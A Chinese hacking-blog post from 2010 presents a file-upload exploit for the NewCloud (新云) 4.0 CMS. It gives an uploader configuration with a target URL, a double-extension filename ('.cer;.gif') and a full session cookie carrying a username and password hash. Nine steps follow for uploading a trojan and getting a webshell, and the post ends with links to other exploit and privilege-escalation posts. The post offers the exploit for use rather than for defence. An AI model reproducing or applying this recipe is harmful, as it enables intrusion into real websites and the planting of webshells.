新云4.0注册上传漏洞(最新漏洞0day)
发布:admin | 发布时间: 2010年3月14日影响版本:新云4.0最新
漏洞描述:
把下面配置文件保存为(xunyun.seraph)
url=http://localhost/users/upload.asp?action=save&ChannelID=1&sType=
filefield=File1
filefield2=
filename=200981623554.cer;.gif
filename2=
local=C:\Documents and Settings\Any\桌面\1.jpg
local2=
type=text/html
type2=image/gif
cookies=pma_cookie_username-1=dXsYNCw7jXS1W0oq9sYg4g%3D%3D; style_cookie=null; AJSTAT_ok_times=1; lastvisit=3934%7C1266468378; csscolor=0; songhidden=0; NewAspUsers=UserToday=0%2C0%2C0%2C0%2C0%2C0&userlastip=127%2E0%2E0%2E1&UserGroup=%C6%D5%CD%A8%BB%E1%D4%B1&UserGrade=1&nickname=seraph&password=4283705e6519c904&UserClass=0&username=seraph&LastTime=2010%2D3%2D9+0%3A10%3A01&userid=1; ASPSESSIONIDSASQQRBT=BKLHHGICELEMHKBMKOBHIGBA; NewAspUsers%5FOnline=UserSessionID=8304709; usercookies%5F1=dayarticlenum=0&daysoftnum=0&userip=127%2E0%2E0%2E1; ASPSESSIONIDQCRRTRBS=PCOHKAJCAPDEFNADGPDDMLBM
name=uploadPic&value=1421
name=Rename&value=1
复制代码准备工作做好了,开始拿SHELL了
1.先找一个可以注册上传图片的新云程序
2.登录后抓取COOKIE内容
3.打开软件,加载刚刚保存的配置文件
4.修改COOKIE以及上传的地址,网址
5.打开http://localhost/users/upload.asp?ChannelID=1,里面找到uploadpic的值
6.双击uploadpic,修改为刚刚得到的值,这是一个验证码,要保证没有刷新页面才行
7.本地文件第一个改成自己要上传的木马
8.点击上传,如果上传失败则试试上传2
9.手动抓取上传地址!
文章如转载,请注明转载自:http://www.5iadmin.com/post/415.html
- 相关文章:
ESCMS cookies欺骗0day (2010-3-2 16:12:45)
ewebeditor for php任意文件上传漏洞 (2010-2-11 16:29:24)
MSN Editor 0DAY (2010-2-1 18:49:15)
Wodig4.1.3Access免费版(UTF-8)上传漏洞利用 (2010-2-1 14:50:44)
搜狗输入法漏洞获取系统权限0day再述 (2010-1-28 10:17:29)
博贤科技管理系统漏洞oday (2010-1-28 10:16:42)
Windows本地提权0day(支持WEBSHELL测试版) (2010-1-27 10:27:9)
windows最新0day 通杀所有版本提权工具 (2010-1-26 14:35:22)
极光 0day漏洞 (2010-1-26 10:5:33)
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。